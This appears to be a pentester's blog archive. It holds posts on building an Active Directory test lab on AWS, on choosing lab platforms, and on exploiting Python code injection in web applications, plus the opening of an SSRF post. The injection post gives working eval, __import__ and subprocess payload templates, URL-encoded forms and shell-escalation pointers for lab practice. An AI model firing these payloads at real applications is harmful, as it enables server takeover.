Thursday, May 4, 2017

Pentest Home Lab - 0x1 - Building Your AD Lab on AWS

In Pentest Home Lab - 0x0 - Building a virtual corporate domain, we talked about why you would want to build your own AD pentest lab, where you can build it (cloud vs on-premises options), and the pros and cons of each option.

This post covers building your lab on AWS. Even if you have a lab at home, setting up a small second home lab on AWS is a worthwhile exercise. You'll learn a lot about AWS in the process.

Table of Contents

  • What are we going to build?
  • Creating your AWS instances
    • Instance #1: This will be the Domain Controller
    • Instance #2: This will be Workstation01 
      • Disable IE Enhanced Security Configuration
    • Instances #3 & #4 (Optional)
    • Create security groups so that your LAN hosts can talk to each other
  • Creating the Domain
    • Setting up WindowsServer2016-1 to be a Domain Controller
      • Configure a static IP (Required)
      • Change the hostname (Optional)
      • Promote the server to a Domain Controller
    • You now have an Active Directory Domain - Add some users
    • Add at least one admin user to your domain admins group
    • The Homestretch - Add all hosts to the domain
      • Configure DNS
      • Add hosts to the domain
      • Add domain users to the remote desktop group

What are we going to build?

At the end of this post, you will have a fully functional AD environment in AWS that you can use to make yourself a better penetration tester.  I'm not going to assume you are familiar with AWS or setting up Active Directory, so some of this might be review.  

You will configure 2-4 AWS EC2 instances.

You will create a Windows 2016 domain, promote one server to be a DC, and add additional hosts to the domain.

You will create at least 2 users and 1 administrator account.

To get started, you really only need a Domain Controller and a Workstation. To be able to test out more stuff, you'll probably end up wanting at least two workstations (User 1's workstation and User 2's workstation), and at least one more non-DC server. 

Note: If you missed my last post, I mentioned that AWS does not provide an AMI (AMIs are like images) for Windows 7/8/10.  I also mentioned that while not a true replica of what we run into on the job, I have found that you can just treat servers as if they were clients, and it is good enough.  In other words, you have everything you need to simulate a compromised victim's workstation for the purposes of our testing with Windows Server 2012/2016. So for our AWS lab, our workstations will just be additional Windows 2016 servers.

One last thing.  To understand/estimate what your AWS lab will cost you, check out the AWS Math section in my last post: Pentest Home Lab - 0x0 - Building a virtual corporate domain.

To summarize:

  • EC2: You pay for EC2 instances only for the hours that the instance is running
  • EBS: You pay for EBS volumes from the time they are provisioned to the time they are removed.  This means that even if you don't use your lab for the entire month, you will still get charged for the provisioned EBS space. 

Some numbers:

  • 2 Windows instances, 1 Kali instance, used 30 hours/month on average
    • Monthly EC2 Cost: $1.38/month
    • Monthly EBS Cost: $8/month
    • Monthly Total: $9.38/month
    • Annual Total: $112
  • 4 Windows instances, 1 Kali instance, used 30 hours/month on average
    • Monthly EC2 Cost: $2.36
    • Monthly EBS Cost: $14
    • Monthly Total: $16.36
    • Annual Total: $196
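To adapt these numbers to your own usage, the arithmetic is simple. Here is a small sketch; the hourly and per-GB rates are illustrative placeholders, not current AWS pricing, so plug in the real rates for your region and instance type:

```python
# Rough lab cost model. EC2 bills only while instances run;
# EBS bills for provisioned space whether instances run or not.
def monthly_cost(instances, hours_per_month, ec2_rate_per_hour,
                 ebs_gb_total, ebs_rate_per_gb_month):
    ec2 = instances * hours_per_month * ec2_rate_per_hour
    ebs = ebs_gb_total * ebs_rate_per_gb_month
    return round(ec2 + ebs, 2)

# e.g., 3 instances at 30 hrs/month, an assumed $0.015/hr rate,
# and 80 GB of EBS at an assumed $0.10/GB-month
print(monthly_cost(3, 30, 0.015, 80, 0.10))
```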

Creating your AWS instances

Instance #1: This will be the Domain Controller

1) If you have not already, Create an AWS account 

2) Once your account is created, log into the AWS Console

3) Once you log in, under Compute, click EC2

4) Under Create Instance, click Launch Instance 

5) Find Microsoft Windows Server 2016 Base and click Select 

6) Pick t2.micro (or any other size)

7) Click Next: Configure Instance Details

8) Accept defaults and click Next: Add Storage (Or if you are more familiar with AWS, feel free to create a new VPC or a new subnet for this lab) 

9) Accept defaults and click Next: Add Tags

10) Accept defaults and click Next: Configure Security Group 

Time to configure your security group. If you are unfamiliar with security groups but familiar with traditional firewalls, think about it like this: a security group is a named set of allow rules, and you can attach as many groups as you want to each AWS instance. The union of all attached rules acts like a per-instance firewall policy.

For your lab, I suggest you limit RDP access to your public ISP assigned address (if you are doing this at work, I suggest using a VPN to connect to your lab). The cool thing is that if this changes, you can just log into the AWS console from anywhere and change the IP in the security group. 

11) Click Review and Launch, then Launch 

12) If you haven't created an AWS keypair yet, create one. If you have, you know what to do here. 

13) Launch Instance 

14) Let's go see our new instance.  Go to Services > EC2 

15) You will now see a new running instance. Click the Running Instances link 

16) Your new instance will say Initializing under Status Checks. It is a good idea to rename it to something like WindowsServer2016-1. 

17) While it finishes initializing, find the instance's public IP. You can find it to the right under IPv4 public IP, or in the lower frame, in the description tab, under IPv4 Public IP

18) Select your instance and click Connect 

19) Download the RDP file, and point the window to your private key so you can decrypt the random password AWS gave your Windows instance. Once you decrypt that password, save it somewhere safe, like in a password vault (e.g., KeePass, Password Safe).

20) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username 

21) Enter the decrypted password

22) You are now logged into your first server. 

Instance #2: This will be Workstation01 

There is a really cool feature within the EC2 console called "Launch More Like This". This launches the EC2 instance wizard with the same EC2 settings as the selected instance, such as security groups, sizing preferences, and desired subnet. But this is NOT like cloning a VM: the OS inside the new instance will be a vanilla install.

1) Go back to EC2 dashboard 

2) Click on WindowsServer2016-1 and click Actions, Launch more like this

3) Click Launch 

4) Select the same keypair you created last time, and click Launch Instances 

5) When it is fully running, download the RDP file again and decrypt the password

6) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username 

7) Enter the decrypted password

8) You are now logged into your second machine

Disable IE Enhanced Security Configuration

This will make IE act more like it does on Windows 10; specifically, it will stop requiring you to add every new site to the Trusted Sites list.

1) Open Server Manager

2) Click Local Server

3) In Properties, navigate to IE Enhanced Security Configuration, and click On

4) Change both options to Off, and click OK

5) Restart IE

Instances #3 & #4 (Optional)

You can either stop here and you'll have:

WindowsServer2016-1 - This will be your DC
WindowsServer2016-2 - This will be your workstation

Or, you can make two more servers and you will have: 

WindowsServer2016-1 - This will be your DC
WindowsServer2016-2 - This will be user 1's workstation
WindowsServer2016-3 - This will be server1
WindowsServer2016-4 - This will be user 2's workstation

Create security groups so that your LAN hosts can talk to each other

Now that we have spun up all of our servers and have successfully RDP'd to each of them, there is one more thing we need to do before we can create our domain. We need to create an AWS Security Group that allows the hosts on your subnet to talk to each other. 

1) On the left navigation bar under Network & Security, select Security Groups, Click Create Security Group

2) Name it, allow all traffic inbound from your subnet. You can leave the outbound tab as is. The default is to allow all outbound traffic.  

3) Click Create

4) Now we need to apply this security group to all of our Lab instances

5) Go to the EC2 view, click Actions, navigate to Networking, and select Change Security Groups

6) Select the new security group *in addition* to the RDP security group you already have selected

7) Click Assign Security Groups

8) Repeat this for ALL Lab instances
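If you prefer the command line, the same steps can be scripted with the AWS CLI. A sketch, with hypothetical group, subnet, and instance IDs that you would replace with your own:

```
# Create the group and allow all traffic from the lab subnet
# (the VPC ID, group ID, and CIDR below are placeholders)
aws ec2 create-security-group --group-name lab-internal \
    --description "Lab hosts talk to each other" --vpc-id vpc-0abc1234
aws ec2 authorize-security-group-ingress --group-id sg-0def5678 \
    --protocol all --cidr 172.31.16.0/20

# modify-instance-attribute REPLACES the instance's group list,
# so include the existing RDP group alongside the new one
aws ec2 modify-instance-attribute --instance-id i-0123456789abcdef0 \
    --groups sg-0def5678 sg-0aaa1111
```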

Creating the Domain

Setting up WindowsServer2016-1 to be a Domain Controller

There are a few things you'll need to do and some you might want to do before creating your domain and promoting your first server to a domain controller.  

Configure a Static IP (Required)

The first thing you want to do is change your private IP from dynamic to static. The private IP address that AWS gives your instance "remains associated with the network interface when the instance is stopped and restarted, and is released when the instance is terminated."  So while this address will not change, it is still dynamic as far as your instance is concerned, and will not pass a "promotion to DC" prerequisite check in Server 2016. There might be a better way to do this, but all I did was configure the instance with a static network configuration, reusing the AWS-assigned dynamic address as the static IP.

1) If you are new to Server 2012/2016, you get to this by right clicking on the networking icon at the bottom left and click Open Network and Sharing Center

2) Click the Ethernet adapter

3) Use Powershell to find the current IP, netmask, and gateway. Set the static configuration to match.
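This can be done entirely in PowerShell on Server 2016. A sketch; the interface alias and addresses below are placeholders, so mirror whatever Get-NetIPConfiguration reports for your instance:

```powershell
# Note the current DHCP-assigned IP, prefix length, and gateway
Get-NetIPConfiguration

# Re-apply the same values statically (placeholder addresses shown)
New-NetIPAddress -InterfaceAlias "Ethernet" -IPAddress 172.31.20.10 `
    -PrefixLength 20 -DefaultGateway 172.31.16.1
```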

Change the Hostname (Optional)

The next thing you might want to do, and this is optional, is to change the hostname to something like AWS-DC01. 

1) If you are new to Server 2012/2016, click the folder icon in the task bar, right click This PC, and click properties

2) The rest should be familiar:

3) You will have to reboot at this point. Give it a few minutes and log back in.  

Promote the server to a Domain Controller

Now let's finally make it a DC. 

1) Open Server Manager 

2) Click Manage, Add Roles and Features 

3) Next, Next, Next 

4) Select Active Directory Domain Services, then click Add Features 

5) Select DNS Server, then click Add Features 

6) Next, Next, Next, Install, Close 

7) In Server Manager, click the yellow triangle and click Promote this server to a domain controller

8) In the wizard, select Add new forest, and give it a root domain name: aws.local 

9) Give it a restore password and drop that in your password manager

10) Next, Next, Next, Next, Next, Install 

11) When it is done, click close (or just wait and it will reboot) 

12) Give it a minute and connect back. Once you connect, it will take a few minutes to fully install. 
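For reference, steps 1-11 above can also be collapsed into two PowerShell commands. A sketch, using the same aws.local domain name:

```powershell
# Install the AD DS role plus the management tools
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools

# Create the forest; this installs DNS and reboots the server when done
Install-ADDSForest -DomainName "aws.local" -InstallDns `
    -SafeModeAdministratorPassword (Read-Host -AsSecureString "DSRM password")
```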

You now have an Active Directory Domain - Add some users

I'm going to walk you through adding a bunch of users, and how to make one of those users a domain administrator. I am not going to cover setting up OUs in this post. If you are interested in doing that now, take a look at this awesome post from Jared Haight: Setting up an Active Directory Lab - Part 3

1) Within Server Manager, click Tools at the top right and select Active Directory Users and Computers

2) Double click on your domain to expand it (either on the left or the right frame)

3) Right click on Users and select New > User

4) Name your users however you want, but I like to keep it simple:
  • First: User
  • Last: 1
  • Login name: user1
  • Click Next
  • Enter an easy to crack password
  • Uncheck user must change at next login
  • Check password never expires
  • Next
  • Finish
5) Repeat for user2 and admin1

Add at least one admin user to your domain admins group

1) Within Active Directory Users and Computers, Double click Domain Admins

2) Click Members

3) Click Add

4) Start typing a username of your admin user and click check names

5) Click OK, OK

The Homestretch - Add all hosts to the domain

Configure DNS

To add a machine to the domain, the one thing you NEED to do is set the domain controller as the primary DNS server.  

1) RDP to server

2) Right click on the networking icon at the bottom left and click Open Network and Sharing Center

3) Select Ethernet Adapter

4) Change the primary DNS server to be the IP address of your DC
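Or, from an elevated PowerShell prompt on the host; the interface alias and DC address below are placeholders:

```powershell
# Point this host at the DC for name resolution
Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 172.31.20.10
```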

Add hosts to the domain

While this process is fairly straightforward, I feel like it never works the first time for me.  If you run into issues, read the notes right after these steps for ideas.

1) Select the folder icon in the task bar

2) Right click This PC

3) Click Properties

4) Under Computer name, domain, and workgroup settings, click Change settings

5) Click Change

6) Give your machine a better hostname: Workstation01 

7) Switch from Workgroup to Domain and specify the domain. For example, aws.local

8) Click OK

9) Enter Domain Admin credentials. Go ahead and use Admin1's credentials.

10) Once your machine has been added, click OK twice

11) Close the window, and go ahead and Restart Now

12) Repeat this for all servers
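The GUI steps above can also be collapsed into a single PowerShell command per host. A sketch, using the hostname and admin account created earlier:

```powershell
# Rename the machine and join it to the domain in one step, then reboot
Add-Computer -DomainName "aws.local" -NewName "Workstation01" `
    -Credential "aws\admin1" -Restart
```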

Having trouble adding your host to the domain?  Here are some troubleshooting tips:

1) Can you ping the IP address of your DC from your other server(s)?
2) Can you resolve the hostname of your DC from your other server(s)?
3) Can you navigate to \\IP_ADDRESS_OF_DC from your other server(s)?

Here are things to look for:

  • AWS Security Groups - Make sure you didn't mess up your security group.
    • Did you choose All TCP instead of All traffic?
    • Did you use the wrong subnet mask for your source (or use the wrong subnet altogether)?
  • Network Config Settings
    • Did you give your DC the right subnet mask when you configured the static IP?
    • Did you configure the primary DNS server properly on your non-DC host?
  • Domain Name - Are you typing in the right domain name when attempting to add your host?

Add domain users to the remote desktop group

1) Select the folder icon in the task bar

2) Right click This PC

3) Click Properties

4) On the left, click Remote Settings, and enter the domain administrator credentials

5) In the Remote Desktop section of the window, click Select Users...

6) Click Add...

7) Type Domain Users and click Check Names

8) Click OK, OK, OK

You should now be able to RDP to this host with any of your domain users (User1, User2, Admin1)


You did it!  You should have 1 DC, and 1-3 additional hosts set up in AWS. You are now ready to try all sorts of stuff, like Empire, Metasploit, Mimikatz, Kerberoasting, and more.

Feedback, suggestions, corrections, and questions are welcome!

Pentest Home Lab - 0x0 - Building a virtual corporate domain

Whether you are a professional penetration tester or want to become one, having a lab environment that includes a full Active Directory domain is really helpful. There have been many times where in order to learn a new skill, technique, exploit, or tool, I've had to first set it up in an AD lab environment.

Reading about attacks and understanding them at a high level is one thing, but I often have a hard time really wrapping my head around something until I've done it myself.  Take Kerberoasting for example: Between Tim's talk a few years back,  Rob's posts, and Will's post, I knew what was happening at a high level, but I didn't want to try out an attack I'd never done before in the middle of an engagement. But before I could try it out for myself, I had to first figure out how to create an SPN. So off to Google I went, and then off to the lab:

  • I set up MSSQL on a domain connected server in my home lab
  • I created a new user in my AD
  • I created an SPN using setspn, pairing the new user to the MSSQL instance
  • I used Empire to grab the SPN hash as an unprivileged domain user (So cool!!)
  • I sent the SPN hash to the password cracker and got the weak password     
THAT was a fun night!
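For context, the SPN step looked roughly like this; the hostname, port, and service account below are hypothetical stand-ins, not the ones from my lab:

```
setspn -s MSSQLSvc/sql01.lab.local:1433 LAB\sqlsvc
```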

So back to the goal of this blog series. I'll share what I've learned while building my own lab(s), I'll share some of the things I've done in my lab to try and improve my skills, and for every attack I cover, I'll also cover how to set up your lab environment.

Selecting Your Virtualization Stack

QUESTION: Should I build this in the cloud or on premises?

Before we can get to any of the hacking, we need to talk about where you are going to install your virtual environment. In fact, your home lab doesn't even need to be located within your home. I'll give an overview of each option, but the decision will likely be influenced by what hardware you have lying around, how much you want to spend up front, and how much you will be using your lab. In the end, you might even want to try more than one option, as they all have distinct benefits.

Cloud Based

Often, building a home lab using dedicated hardware is cost prohibitive. In addition to hardware costs, if you add windows licensing costs, a traditional home lab can get really expensive. The good news is these days you don't need to buy any hardware or software (OS). You can build your lab using AWS, Azure, Google, etc. In addition to not having to purchase hardware, another major advantage of building your lab in the cloud is that the Windows licensing costs are built into your hourly rate (at least for AWS -- I'm not as familiar with Azure or Google). 


Pros:

  • Hardware
    • No hardware purchases
  • OS Licensing
    • No Windows OS software purchases
    • No expiring Windows eval licenses
  • Hourly Pricing
    • You only pay for the time you use the lab machines
  • Education
    • You will learn a lot about the cloud stack you are building on

Cons:

  • Cost
    • Leaving your instances running gets pretty expensive. Four Windows servers (t2.micro) running 24/7 will put you at around 45 bucks a month
  • Keeping track of instances
    • If you don't want them running all the time, you will have to remember to shut down instances when not in use or configure CloudWatch to do that for you
  • You can't pause instances
    • In AWS at least, you can't pause VMs like you can with virtualization software. This is pretty annoying if you are used to pausing your VMs at the end of each session and picking up where you left off
  • Limited Windows OS Support
    • No Windows 7/8/10 images (might be AWS specific)
  • Some testing activities need to be approved
    • You'll have to notify the cloud provider if you want to attack your instances from outside your virtual private cloud (VPC)

AWS Math

AWS can be reasonable for home use, or it can get very expensive, depending on how you use it. The key here is to think about how much you will be using your lab.  If you think you will play in your lab around 3 hours a night about 10 nights a month, AWS makes a lot of sense. If you are going to be running your hosts permanently, it will probably be more cost effective to run your lab on premises.

Here are some cost estimations using AWS's cost estimator:

Update (5/8/2017):  I previously did not include EBS volume costs in the tables below. I've updated the tables to include EBS volume costs (30GB for each windows volume, 20GB for Kali).  You are charged for provisioned EBS volumes whether the instance is running or stopped.

2 Windows instances, 1 Kali instance

Annual cost if you use your lab 30 hours a month on average: $112/year.

4 Windows instances, 1 Kali instance

Annual cost if you use your lab 30 hours a month on average: $196/year

These are just estimates. You can save money by choosing a smaller volume size at instance creation, keeping your Kali instance local, and by tearing down and rebuilding some or all of the environment if you feel like you don't need it for a few months.

Also, as you can see, the difference in EC2 costs is pretty extreme if you leave your instances running all the time. Remember to turn off those instances when not in use!

One caveat with building your lab entirely in the cloud, at least with AWS, is that AWS does not offer an AMI for Windows 7/8/10. While it appears possible to use your own Windows 7/8/10 image, that puts you back to either using eval licenses or paying for them. While doing research for this blog series, I came across something called Amazon WorkSpaces, and even that does not use 7/8/10. It simulates a desktop environment using Microsoft's Desktop Experience via Windows Server 2012. 

After playing around with Amazon WorkSpaces, I realized it is not the best option for a pentest lab due to monthly costs ($7 per month per workstation), but I did learn that you don't really NEED Windows 7/8/10 in your pentest home lab to do most of what we will want to do, which was a good lesson.

In an upcoming post, I will write in detail about Building your AD lab on AWS.

On Premises

If you are going to build the lab on your own hardware, the next decision you need to make is: do I use dedicated hardware and a hypervisor, or do I run software that sits on top of my host OS, like VMware Workstation Pro, Workstation Player, VMware Fusion (Mac), or VirtualBox?

Using your Desktop/Laptop

If you have a desktop/laptop with plenty of resources to spare, there is no reason you can't set this entire environment up on your OS of choice using either VMware or VirtualBox. On my laptop, I use VMware Workstation and have a test domain with 1 domain controller, 1 additional Windows server, and 1 Windows 7 host. With a 1TB HDD and 16GB of RAM, I can run all three, plus Kali, at the same time. If you can swing 32GB and a bigger SSD, that would give you even more flexibility. As I mention in the cons below, you might be limited: my current laptop can't take more than 16GB.


Pros:

  • Mobility
    • Take your lab with you wherever you go (if you have a laptop)
  • Easy entry
    • You probably already have a Desktop/Laptop that you can use
  • Free Options
    • VirtualBox and VMware Workstation Player are free


Cons:

  • Cost
    • VMware Workstation Pro (windows) and VMware Fusion (mac) are not free
  • Hardware Limitations 
    • Your current desktop/laptop might be limited in how much memory you can add to it
  • Shared Resourcing
    • You are competing for shared resources on your host OS. This might not be acceptable
    • Every time you need to reboot your host OS, you have to stop/pause all of your VMs

Using a Hypervisor

Most penetration testers that I know still keep it traditional and use dedicated hardware combined with a hypervisor for their home lab. There are plenty of great articles that talk about hardware requirements and options. I have friends who prefer to go the route of buying old enterprise hardware on eBay, but I have always just used consumer hardware. Either way, between the RAM and fast disks, it can get expensive. On my server, I have an AMD 8-core chip circa 2015, and I just upgraded from 16 to 32GB of RAM, and from a 512GB SSD to a 1TB SSD. If you can afford it, avoid the mistake I made and go right to 32GB of RAM and a 1TB SSD. That will give you more than enough room to grow your lab, make templates, take lots of snapshots, etc.


Pros:

  • Flexibility
    • With dedicated hardware, you can isolate the lab on its own network, VLAN, etc. 
  • Software cost
    • There are plenty of free options when it comes to Hypervisors
  • Options
    • You can take advantage of things like KVM, containers, and thin provisioning  
  • Portability
    • If you use something small like an Intel NUC, your lab can be portable


Cons:

  • Energy Inefficient
    • The last thing anyone who reads this post needs is yet another computer running 24/7 ;)
  • Cost
    • Unless you have something laying around already, you'll have to buy new hardware
  • Vendor Specific Knowledge
    • Do you have the time and desire to learn all of the hypervisor specific troubleshooting commands when something breaks?  

Great Home Lab Resources

Home Lab Design by Carlos Perez
My new home lab setup by Carlos Perez
Building an Effective Active Directory Lab Environment for Testing by Sean Metcalf
Intel NUC Super Server by Mubix

Over the years I've played with a few of the popular Hypervisors, and here are my thoughts:

VMware ESXi - My first lab was ESXi. If you've never used it, I recommend using this as your hypervisor if for no other reason than it is ubiquitous in the enterprise. You will find ESX on every internal pentest, and having experience with it from your home lab will help you one day.

Citrix Xen - Eventually my ESX hard drive failed. After reading this post by Mubix, when I rebuilt, I tried Citrix's Xen Server. I liked Xen, but I quickly ran out of space on my 512GB SSD, and when I added a second drive it started to freak out. The amount of custom Xen commands I had to learn was getting out of control, and I didn't feel like the experience was going to help me all that much, so I pulled the plug and looked for something new.

Proxmox VE - For my third iteration, I'm using Proxmox VE, after my friend @mikehacksthings gave a presentation on it at a recent @IthacaSec meeting. I really like it! Thin provisioning means it uses a lot less resources, and it seems lightning fast compared to ESXi and Xen. It definitely has my stamp of approval so far.

In an upcoming post, I'm going to write in detail about building your AD lab on premises using Proxmox.

Getting Windows Server Software

If you are going to build your lab in the cloud, you can just relax and skip this section. If you are going to build on premises, you will need to get your hands on the following software:
  • Required - Windows Server (2012 or 2016)
  • Optional - Windows 7 (or 8 or 10)   
In terms of getting the software, there are a few options: 
  1. Download evaluation versions, which are good for 180 days.
  2. See if your workplace has a key/iso that can be used in a lab environment.
  3. Go with a cloud solution like AWS or Azure where the licensing costs are built into your hourly rate.
  4. If you are a student, you may be able to get the OSes for free.
For more detail on these options, check out Sean Metcalf's blog post: Building an Effective Active Directory Lab Environment for Testing. You will also notice that Sean gives some really useful breakdowns of what he feels you need in an AD lab. I'm going to keep this series more basic than that, but I encourage you to read his post.

Let's create a Domain

Once you have selected your virtualization stack, it is time to configure it. The following two posts take you through setting up two AD Lab environments. One in the cloud using AWS, and another on premises using Proxmox VE.

Pentest Home Lab - 0x1 - Building Your AD Lab on AWS
Pentest Home Lab - 0x2 - Building Your AD Lab on Premises (Coming Soon)


Feedback, suggestions, corrections, and questions are welcome!

Wednesday, November 9, 2016

Exploiting Python Code Injection in Web Applications

A web application vulnerable to Python code injection allows you to send Python code through the application to the Python interpreter on the target server. If you can execute Python, you can likely call operating system commands. If you can run operating system commands, you can read/write files that you have access to, and potentially even launch a remote interactive shell (e.g., nc, Metasploit, Empire).

The thing is, when I needed to exploit this on an external penetration test recently, I had a hard time finding information online about how to move from proof of concept (POC) to useful web application exploitation. Together with my colleague Charlie Worrell (@decidedlygray), we were able to turn the Burp POC (sleep for 20 seconds) into a non interactive shell, which is what this post covers.

Python code injection is a subset of server-side code injection, as this vulnerability can occur in many other languages (e.g., Perl and Ruby). In fact, for those of you who are CWE fans like I am, these two CWEs are right on point:

CWE-94: Improper Control of Generation of Code ('Code Injection')
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')


If you (or Burp, or another tool) find a Python injection with a payload like this:

eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

You can use the following payload to go from a time based POC to OS command injection:

eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))

And as it turns out, you don't even need the for loop. You can use the global __import__ function:
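A runnable sketch of that payload shape, where 'echo injected' is a harmless stand-in for an attacker's command:

```python
# __import__ collapses "import os" plus os.popen() into one expression,
# so the for-loop wrapper is no longer needed
payload = "__import__('os').popen('echo injected').read()"

# compile(..., 'single') still works here; when eval() runs it, the
# expression's value is echoed back via sys.displayhook
eval(compile(payload, '<injected>', 'single'))
```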


Better yet, now that we have import and popen as one expression, in most cases, you don't even need to use compile at all:
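For example (again with 'echo injected' standing in for a real command):

```python
# The whole payload is now a single expression, so plain eval() suffices
result = eval("__import__('os').popen('echo injected').read()")
print(result.strip())
```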


To pass these to the web application, you will have to URL encode some characters. The examples from above are each encoded below to illustrate what they might look like in action:

  • param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
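For reference, Python's standard library reproduces that encoding exactly:

```python
from urllib.parse import quote

# The time.sleep(20) POC payload; the \n escapes become real newlines
payload = ("eval(compile('for x in range(1):\n import time"
           "\n time.sleep(20)','a','single'))")

# safe='' percent-encodes everything non-alphanumeric, including '/'
print("param=" + quote(payload, safe=''))
```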
The rest of the post will dig into the details, share an intentionally vulnerable web app, and at the end of the post I'll demo a tool that Charlie and I wrote that really speeds up exploitation of this vulnerability -- kind of like what sqlmap does for SQLi, but in its infancy.

Setting up a Vulnerable Server

I created an intentionally vulnerable application for the purpose of this post, so if you want to exploit this in your lab, you can grab it here. To get it to work, you just have to install it via pip or easy_install, but that is it. It can run as a standalone server, or it can be loaded into Apache with mod_wsgi.

git clone
cd VulnApp

The Vulnerability

Although you would be hard-pressed to find an article online that talks about Python's eval() without warning that it is unsafe, eval() is the most likely culprit here. The vulnerability exists when the following two conditions are met: 
  1. Application accepts user input (e.g., GET/POST param, cookie value)
  2. Application passes that user controlled input to eval in an unsafe way (without sanitization or other protection mechanisms). 
Here is a simplified version of what the vulnerable code could look like:
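A minimal stand-in for that pattern (my own sketch, not the actual demo app; the parameter name 'input' is hypothetical):

```python
# Dangerous pattern: attacker-controlled input flows straight into eval()
def handle_request(params):
    expression = params.get('input', '')    # user-controlled value
    return str(eval(expression))            # the vulnerability

# A benign request evaluates arithmetic...
print(handle_request({'input': '1+1'}))
# ...while an injected one runs OS commands
print(handle_request({'input': "__import__('os').popen('echo pwned').read()"}))
```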

That said, eval() is only one of the potential culprits here.  A developer can also introduce this vulnerability by unpickling serialized data passed by the user.

Python's exec() is another way you can make your app vulnerable, but as far as I can tell, a developer would have to try even harder to find a reason to exec() web based user input.  That said, I'm sure it happens.

Automated Discovery 

Having a scanner find something I haven't seen before, and then doing the research to move from vanilla POC to something report-worthy, has been one of the pillars of my offensive security education (along with learning how to find things that scanners cannot find). This vulnerability is no different. If you find this in the wild, you will most likely find it with an automated tool, like Burp Suite Pro. In fact, the check Burp uses is something they developed internally, so I'm not sure you would even find this vulnerability without Burp Suite Pro at this point.

Once you have the vulnerable demo app up and running, you should be able to find the vulnerability with a Burp Suite Pro scan: 

Here are the details showing the payload that Burp used to find this vulnerability:

The reason Burp flags the app as vulnerable is that after it sent this payload, which told the interpreter to sleep for 20 seconds, the response took 20 seconds to come back. As with any time-based vulnerability check, every once in a while there are false positives, usually because the app in general starts responding slowly.

Moving from POC to Targeted Exploitation

While time.sleep is a nice way to confirm the vulnerability, we want to execute OS commands AND receive the output. To do that, we had success with os.popen(), subprocess.Popen(), and subprocess.check_output(), and I'm sure there are others.

The Burp Suite Pro payload uses a clever hack (using compile()) that is required if you have multiple statements, as eval() can only evaluate expressions. There is another way to accomplish this, using global functions (e.g. __import__), which is explained here and here.
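The distinction is easy to demonstrate locally:

```python
# eval() only accepts expressions, so a bare statement fails to parse.
try:
    eval("import os")
except SyntaxError:
    print("eval() rejects statements")

# Wrapping the statement with compile(..., 'single') works around that.
eval(compile("import os", '', 'single'))

# __import__ is an expression, so it needs no compile() wrapper at all.
out = eval("__import__('os').popen(r'echo hi').read()")
print(out)
```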

This payload should work in most cases:

# Example with one expression

  • __import__('os').popen(r'COMMAND').read()

# Example with multiple expressions, separated by commas

  • __import__('os').popen(r'COMMAND').read(),__import__('time').sleep(2)

If you need to execute a statement, or multiple statements, you will have to use eval/compile:

# Examples with one expression

  • eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))
  • eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True)""",'','single'))
# Examples with multiple statements, separated by semicolons

  • eval(compile("""__import__('os').popen(r'COMMAND').read();import time;time.sleep(2)""",'','single'))
  • eval(compile("""__import__('subprocess').check_output(r'COMMAND',shell=True);import time;time.sleep(2)""",'','single'))

In my testing, some things just did not work with the global __import__ trick above, like subprocess.Popen.  In that case, stick with the for-loop technique that the Burp team came up with:

  • eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))
  • eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE)""",'','single'))
  • eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'COMMAND',shell=True)""",'','single'))
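You can sanity-check the for-loop trick locally. Assigning the command output to a variable (instead of reflecting it in an HTTP response) makes the result visible:

```python
# The for-loop wrapper lets compile(..., 'single') accept multiple
# indented statements; the command output is captured in `out`.
src = "for x in range(1):\n import subprocess\n out = subprocess.check_output(r'echo hi', shell=True)\n"
eval(compile(src, '', 'single'))
print(out)
```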

If your vulnerable parameter is a GET parameter, you can exploit this easily with just your browser: 

Note: Browsers do most of the required URL encoding for you, but you will have to manually encode semicolons (%3b) and spaces (%20) if they are used, or use the tool we developed, which is covered below.
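If you'd rather let Python do the encoding, urllib.parse.quote handles both characters:

```python
from urllib.parse import quote

payload = "eval(compile(\"\"\"import time; time.sleep(2)\"\"\",'','single'))"
encoded = quote(payload, safe='')  # encodes ';' as %3B and ' ' as %20
print(encoded)
```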

If you are working with a POST parameter (or a cookie value which was the case on my pentest), you'll probably want to use Burp Repeater or something similar. This next series of screenshots shows me using subprocess.check_output() to call pwd, ls -al, whoami, and ping, all in one expression:

Manually URL encoding characters gets old fast, so you will probably find yourself wanting to whip up a Python script to send the requests from the command line, like Charlie and I did.  Or, if you'd like, you can use ours.
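A minimal version of such a script can be sketched with the standard library alone (the endpoint and parameter name below are hypothetical, and this is not PyCodeInjectionShell itself):

```python
import urllib.parse
import urllib.request

def build_url(base, param, payload):
    # urlencode fully escapes the payload, including semicolons and spaces.
    return f"{base}?{urllib.parse.urlencode({param: payload})}"

def send(base, param, payload):
    # Fire the injection request and return the response body.
    with urllib.request.urlopen(build_url(base, param, payload)) as resp:
        return resp.read().decode()

# Hypothetical vulnerable endpoint and parameter name:
url = build_url("", "price",
                "eval(compile(\"\"\"import time; time.sleep(2)\"\"\",'','single'))")
print(url)
```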

Exploitation Demonstration with PyCodeInjectionShell

You can download PyCodeInjectionShell and read up on how to use it here: PyCodeInjectionShell. It is written to feel like sqlmap as much as possible; our assumption is that anyone who needs to use this tool is probably very familiar with sqlmap.

Here is what it looks like in action, accepting a URL. Note the sqlmap style * designating the payload placement in the URL. This example also uses interactive mode, which lets you continuously enter new commands until you exit:

And here is the same functionality using a request file copy/pasted from Burp Repeater, with an implanted *, which tells the tool where to inject:

In either example, if you just want to enter one command and exit, just remove the -i.

Feedback, suggestions, questions and bug reports are welcome!

Wednesday, December 23, 2015

Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)

I recently came across a Server Side Request Forgery (SSRF) vulnerability within an application that I assessed.  The application was hosted on Amazon EC2 and was using Node.js, Express.js, and as I found out later, Needle.js.



